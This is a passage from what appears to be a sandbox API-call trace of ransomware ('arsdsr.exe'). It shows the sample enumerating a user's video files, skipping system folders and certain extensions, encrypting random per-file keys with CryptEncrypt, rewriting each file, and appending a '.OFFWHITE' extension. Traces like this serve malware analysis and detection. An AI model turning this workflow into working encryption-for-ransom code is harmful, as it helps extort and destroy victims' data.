(lpString1="uklfuhm_mXhv.avi", lpString2="ntuser.dat") returned 1 [0136.377] lstrcmpiW (lpString1="uklfuhm_mXhv.avi", lpString2="programdata") returned 1 [0136.377] lstrcmpiW (lpString1="uklfuhm_mXhv.avi", lpString2="appdata") returned 1 [0136.377] lstrcmpiW (lpString1="uklfuhm_mXhv.avi", lpString2="program files") returned 1 [0136.377] lstrcmpiW (lpString1="uklfuhm_mXhv.avi", lpString2="program files (x86)") returned 1 [0136.377] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\" [0136.377] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\", lpString2="uklfuhm_mXhv.avi" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\uklfuhm_mXhv.avi") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\uklfuhm_mXhv.avi" [0136.377] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.377] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.377] PathFindExtensionW (pszPath="uklfuhm_mXhv.avi") returned=".avi" [0136.377] lstrcmpiW (lpString1=".avi", lpString2=".exe") returned -1 [0136.377] lstrcmpiW (lpString1=".avi", lpString2=".log") returned -1 [0136.377] lstrcmpiW (lpString1=".avi", lpString2=".cab") returned -1 [0136.377] lstrcmpiW (lpString1=".avi", lpString2=".cmd") returned -1 [0136.377] lstrcmpiW (lpString1=".avi", lpString2=".com") returned -1 [0136.377] lstrcmpiW (lpString1=".avi", lpString2=".cpl") returned -1 [0136.377] lstrcmpiW (lpString1=".avi", lpString2=".ini") returned -1 [0136.377] lstrcmpiW (lpString1=".avi", lpString2=".dll") returned -1 [0136.377] lstrcmpiW (lpString1=".avi", lpString2=".url") returned -1 [0136.377] lstrcmpiW (lpString1=".avi", lpString2=".ttf") returned -1 [0136.377] lstrcmpiW (lpString1=".avi", lpString2=".mp3") returned -1 [0136.377] lstrcmpiW (lpString1=".avi", lpString2=".pif") returned -1 [0136.378] lstrcmpiW (lpString1=".avi", lpString2=".mp4") returned -1 [0136.378] lstrcmpiW (lpString1=".avi", lpString2=".OFFWHITE") returned -1 [0136.378] lstrcmpiW (lpString1=".avi", lpString2=".msi") returned -1 [0136.378] lstrcmpiW (lpString1="uklfuhm_mXhv.avi", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0136.378] GetProcessHeap () returned 0x500000 [0136.378] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x5220f0 [0136.378] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\uklfuhm_mXhv.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghq_bjyyobo\\uklfuhm_mxhv.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0136.378] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=91617) returned 1 [0136.378] GetProcessHeap () returned 0x500000 [0136.378] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5315a8 [0136.378] GetProcessHeap () returned 0x500000 [0136.378] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x531578 [0136.378] GetProcessHeap () returned 0x500000 [0136.378] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525228 [0136.378] GetProcessHeap () returned 0x500000 [0136.378] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525120 [0136.378] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.378] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.378] SystemFunction036 (in: RandomBuffer=0x5315a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5315a8) returned 1 [0136.378] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.378] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.378] SystemFunction036 (in: RandomBuffer=0x531578, RandomBufferLength=0x10 | out: RandomBuffer=0x531578) returned 1 [0136.378] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.379] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.379] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525228*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x525228*, pdwDataLen=0x295dc90*=0x100) returned 1 [0136.379] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.379] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.379] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525120*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x525120*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0136.379] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x165e1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.379] SetLastError (dwErrCode=0x0) [0136.379] WriteFile (in: hFile=0x21c, lpBuffer=0x525228*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x525228*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0136.381] GetLastError () returned 0x0 [0136.381] GetLastError () returned 0x0 [0136.381] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x166e1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.381] WriteFile (in: hFile=0x21c, lpBuffer=0x525120*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x525120*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0136.381] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x167e1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.381] WriteFile (in: hFile=0x21c, lpBuffer=0x5220f0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5220f0*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0136.381] GetProcessHeap () returned 0x500000 [0136.381] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x165e1) returned 0x55a7b8 [0136.381] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.381] ReadFile (in: hFile=0x21c, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0x165e1, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295dec0*=0x165e1, lpOverlapped=0x0) returned 1 [0136.386] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.386] WriteFile (in: hFile=0x21c, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0x165e1, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295decc*=0x165e1, lpOverlapped=0x0) returned 1 [0136.386] GetProcessHeap () returned 0x500000 [0136.386] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0136.386] CloseHandle (hObject=0x21c) returned 1 [0136.390] GetProcessHeap () returned 0x500000 [0136.390] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525228 | out: hHeap=0x500000) returned 1 [0136.390] GetProcessHeap () returned 0x500000 [0136.390] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525120 | out: hHeap=0x500000) returned 1 [0136.390] GetProcessHeap () returned 0x500000 [0136.390] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5315a8 | out: hHeap=0x500000) returned 1 [0136.390] GetProcessHeap () returned 0x500000 [0136.391] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x531578 | out: hHeap=0x500000) returned 1 [0136.391] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\uklfuhm_mXhv.avi" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\uklfuhm_mXhv.avi") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\uklfuhm_mXhv.avi" [0136.391] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\uklfuhm_mXhv.avi", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\uklfuhm_mXhv.avi.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\uklfuhm_mXhv.avi.OFFWHITE" [0136.391] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\uklfuhm_mXhv.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghq_bjyyobo\\uklfuhm_mxhv.avi"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\uklfuhm_mXhv.avi.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghq_bjyyobo\\uklfuhm_mxhv.avi.offwhite")) returned 1 [0136.391] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x548ed1f0, ftCreationTime.dwHighDateTime=0x1d5e381, ftLastAccessTime.dwLowDateTime=0x1cfa6b20, ftLastAccessTime.dwHighDateTime=0x1d5dd85, ftLastWriteTime.dwLowDateTime=0x1cfa6b20, ftLastWriteTime.dwHighDateTime=0x1d5dd85, nFileSizeHigh=0x0, nFileSizeLow=0x17e8, dwReserved0=0x295debc, dwReserved1=0x48e59e2e, cFileName="w1zsv5pVGgKsXbT6wKb.avi", cAlternateFileName="W1ZSV5~1.AVI")) returned 1 [0136.391] lstrcmpiW (lpString1="w1zsv5pVGgKsXbT6wKb.avi", lpString2=".") returned 1 [0136.391] lstrcmpiW (lpString1="w1zsv5pVGgKsXbT6wKb.avi", lpString2="..") returned 1 [0136.392] lstrcmpiW (lpString1="w1zsv5pVGgKsXbT6wKb.avi", lpString2="...") returned 1 [0136.392] lstrcmpiW (lpString1="w1zsv5pVGgKsXbT6wKb.avi", lpString2="windows") returned -1 [0136.392] lstrcmpiW (lpString1="w1zsv5pVGgKsXbT6wKb.avi", lpString2="$recycle.bin") returned 1 [0136.392] lstrcmpiW (lpString1="w1zsv5pVGgKsXbT6wKb.avi", lpString2="rsa") returned 1 [0136.392] lstrcmpiW (lpString1="w1zsv5pVGgKsXbT6wKb.avi", lpString2="ntuser.dat") returned 1 [0136.392] lstrcmpiW (lpString1="w1zsv5pVGgKsXbT6wKb.avi", lpString2="programdata") returned 1 [0136.392] lstrcmpiW (lpString1="w1zsv5pVGgKsXbT6wKb.avi", lpString2="appdata") returned 1 [0136.392] lstrcmpiW (lpString1="w1zsv5pVGgKsXbT6wKb.avi", lpString2="program files") returned 1 [0136.392] lstrcmpiW (lpString1="w1zsv5pVGgKsXbT6wKb.avi", lpString2="program files (x86)") returned 1 [0136.392] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\" [0136.392] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\", lpString2="w1zsv5pVGgKsXbT6wKb.avi" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\w1zsv5pVGgKsXbT6wKb.avi") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\w1zsv5pVGgKsXbT6wKb.avi" [0136.392] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.392] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.392] PathFindExtensionW (pszPath="w1zsv5pVGgKsXbT6wKb.avi") returned=".avi" [0136.392] lstrcmpiW (lpString1=".avi", lpString2=".exe") returned -1 [0136.392] lstrcmpiW (lpString1=".avi", lpString2=".log") returned -1 [0136.392] lstrcmpiW (lpString1=".avi", lpString2=".cab") returned -1 [0136.392] lstrcmpiW (lpString1=".avi", lpString2=".cmd") returned -1 [0136.392] lstrcmpiW (lpString1=".avi", lpString2=".com") returned -1 [0136.392] lstrcmpiW (lpString1=".avi", lpString2=".cpl") returned -1 [0136.392] lstrcmpiW (lpString1=".avi", lpString2=".ini") returned -1 [0136.392] lstrcmpiW (lpString1=".avi", lpString2=".dll") returned -1 [0136.392] lstrcmpiW (lpString1=".avi", lpString2=".url") returned -1 [0136.392] lstrcmpiW (lpString1=".avi", lpString2=".ttf") returned -1 [0136.392] lstrcmpiW (lpString1=".avi", lpString2=".mp3") returned -1 [0136.392] lstrcmpiW (lpString1=".avi", lpString2=".pif") returned -1 [0136.392] lstrcmpiW (lpString1=".avi", lpString2=".mp4") returned -1 [0136.392] lstrcmpiW (lpString1=".avi", lpString2=".OFFWHITE") returned -1 [0136.392] lstrcmpiW (lpString1=".avi", lpString2=".msi") returned -1 [0136.392] lstrcmpiW (lpString1="w1zsv5pVGgKsXbT6wKb.avi", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0136.392] GetProcessHeap () returned 0x500000 [0136.393] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x522100 [0136.393] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\w1zsv5pVGgKsXbT6wKb.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghq_bjyyobo\\w1zsv5pvggksxbt6wkb.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0136.393] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=6120) returned 1 [0136.393] GetProcessHeap () returned 0x500000 [0136.393] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x531578 [0136.393] GetProcessHeap () returned 0x500000 [0136.393] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5315a8 [0136.393] GetProcessHeap () returned 0x500000 [0136.393] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525120 [0136.393] GetProcessHeap () returned 0x500000 [0136.393] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525228 [0136.393] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.393] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.393] SystemFunction036 (in: RandomBuffer=0x531578, RandomBufferLength=0x10 | out: RandomBuffer=0x531578) returned 1 [0136.393] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.393] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.393] SystemFunction036 (in: RandomBuffer=0x5315a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5315a8) returned 1 [0136.393] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.393] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.393] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525120*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x525120*, pdwDataLen=0x295dc90*=0x100) returned 1 [0136.394] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.394] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.394] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525228*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x525228*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0136.394] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x17e8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.394] SetLastError (dwErrCode=0x0) [0136.394] WriteFile (in: hFile=0x21c, lpBuffer=0x525120*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x525120*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0136.396] GetLastError () returned 0x0 [0136.396] GetLastError () returned 0x0 [0136.396] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x18e8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.396] WriteFile (in: hFile=0x21c, lpBuffer=0x525228*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x525228*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0136.396] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x19e8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.396] WriteFile (in: hFile=0x21c, lpBuffer=0x522100*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x522100*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0136.396] GetProcessHeap () returned 0x500000 [0136.396] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x17e8) returned 0x55a7b8 [0136.396] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.396] ReadFile (in: hFile=0x21c, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0x17e8, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295dec0*=0x17e8, lpOverlapped=0x0) returned 1 [0136.397] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.397] WriteFile (in: hFile=0x21c, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0x17e8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295decc*=0x17e8, lpOverlapped=0x0) returned 1 [0136.397] GetProcessHeap () returned 0x500000 [0136.397] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0136.397] CloseHandle (hObject=0x21c) returned 1 [0136.406] GetProcessHeap () returned 0x500000 [0136.406] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525120 | out: hHeap=0x500000) returned 1 [0136.406] GetProcessHeap () returned 0x500000 [0136.406] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525228 | out: hHeap=0x500000) returned 1 [0136.406] GetProcessHeap () returned 0x500000 [0136.406] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x531578 | out: hHeap=0x500000) returned 1 [0136.406] GetProcessHeap () returned 0x500000 [0136.406] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5315a8 | out: hHeap=0x500000) returned 1 [0136.406] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\w1zsv5pVGgKsXbT6wKb.avi" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\w1zsv5pVGgKsXbT6wKb.avi") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\w1zsv5pVGgKsXbT6wKb.avi" [0136.406] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\w1zsv5pVGgKsXbT6wKb.avi", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\w1zsv5pVGgKsXbT6wKb.avi.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\w1zsv5pVGgKsXbT6wKb.avi.OFFWHITE" [0136.406] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\w1zsv5pVGgKsXbT6wKb.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghq_bjyyobo\\w1zsv5pvggksxbt6wkb.avi"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\w1zsv5pVGgKsXbT6wKb.avi.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghq_bjyyobo\\w1zsv5pvggksxbt6wkb.avi.offwhite")) returned 1 [0136.407] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53617920, ftCreationTime.dwHighDateTime=0x1d5e7ed, ftLastAccessTime.dwLowDateTime=0x318b1fc0, ftLastAccessTime.dwHighDateTime=0x1d5db9c, ftLastWriteTime.dwLowDateTime=0x318b1fc0, ftLastWriteTime.dwHighDateTime=0x1d5db9c, nFileSizeHigh=0x0, nFileSizeLow=0xf1e7, dwReserved0=0x295debc, dwReserved1=0x48e59e2e, cFileName="WYaejJiwLrd0.mkv", cAlternateFileName="WYAEJJ~1.MKV")) returned 1 [0136.407] lstrcmpiW (lpString1="WYaejJiwLrd0.mkv", lpString2=".") returned 1 [0136.407] lstrcmpiW (lpString1="WYaejJiwLrd0.mkv", lpString2="..") returned 1 [0136.407] lstrcmpiW (lpString1="WYaejJiwLrd0.mkv", lpString2="...") returned 1 [0136.407] lstrcmpiW (lpString1="WYaejJiwLrd0.mkv", lpString2="windows") returned 1 [0136.407] lstrcmpiW (lpString1="WYaejJiwLrd0.mkv", lpString2="$recycle.bin") returned 1 [0136.407] lstrcmpiW (lpString1="WYaejJiwLrd0.mkv", lpString2="rsa") returned 1 [0136.407] lstrcmpiW (lpString1="WYaejJiwLrd0.mkv", lpString2="ntuser.dat") returned 1 [0136.407] lstrcmpiW (lpString1="WYaejJiwLrd0.mkv", lpString2="programdata") returned 1 [0136.408] lstrcmpiW (lpString1="WYaejJiwLrd0.mkv", lpString2="appdata") returned 1 [0136.408] lstrcmpiW (lpString1="WYaejJiwLrd0.mkv", lpString2="program files") returned 1 [0136.408] lstrcmpiW (lpString1="WYaejJiwLrd0.mkv", lpString2="program files (x86)") returned 1 [0136.408] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\" [0136.408] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\", lpString2="WYaejJiwLrd0.mkv" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\WYaejJiwLrd0.mkv") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\WYaejJiwLrd0.mkv" [0136.408] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.408] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.408] PathFindExtensionW (pszPath="WYaejJiwLrd0.mkv") returned=".mkv" [0136.408] lstrcmpiW (lpString1=".mkv", lpString2=".exe") returned 1 [0136.408] lstrcmpiW (lpString1=".mkv", lpString2=".log") returned 1 [0136.408] lstrcmpiW (lpString1=".mkv", lpString2=".cab") returned 1 [0136.408] lstrcmpiW (lpString1=".mkv", lpString2=".cmd") returned 1 [0136.408] lstrcmpiW (lpString1=".mkv", lpString2=".com") returned 1 [0136.408] lstrcmpiW (lpString1=".mkv", lpString2=".cpl") returned 1 [0136.408] lstrcmpiW (lpString1=".mkv", lpString2=".ini") returned 1 [0136.408] lstrcmpiW (lpString1=".mkv", lpString2=".dll") returned 1 [0136.408] lstrcmpiW (lpString1=".mkv", lpString2=".url") returned -1 [0136.408] lstrcmpiW (lpString1=".mkv", lpString2=".ttf") returned -1 [0136.408] lstrcmpiW (lpString1=".mkv", lpString2=".mp3") returned -1 [0136.408] lstrcmpiW (lpString1=".mkv", lpString2=".pif") returned -1 [0136.408] lstrcmpiW (lpString1=".mkv", lpString2=".mp4") returned -1 [0136.408] lstrcmpiW (lpString1=".mkv", lpString2=".OFFWHITE") returned -1 [0136.408] lstrcmpiW (lpString1=".mkv", lpString2=".msi") returned -1 [0136.408] lstrcmpiW (lpString1="WYaejJiwLrd0.mkv", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0136.408] GetProcessHeap () returned 0x500000 [0136.408] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x522110 [0136.409] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\WYaejJiwLrd0.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghq_bjyyobo\\wyaejjiwlrd0.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0136.409] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=61927) returned 1 [0136.409] GetProcessHeap () returned 0x500000 [0136.409] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5315a8 [0136.409] GetProcessHeap () returned 0x500000 [0136.409] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x531578 [0136.409] GetProcessHeap () returned 0x500000 [0136.409] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525228 [0136.409] GetProcessHeap () returned 0x500000 [0136.409] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525120 [0136.409] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.409] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.409] SystemFunction036 (in: RandomBuffer=0x5315a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5315a8) returned 1 [0136.409] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.409] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.409] SystemFunction036 (in: RandomBuffer=0x531578, RandomBufferLength=0x10 | out: RandomBuffer=0x531578) returned 1 [0136.409] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.409] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.410] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, 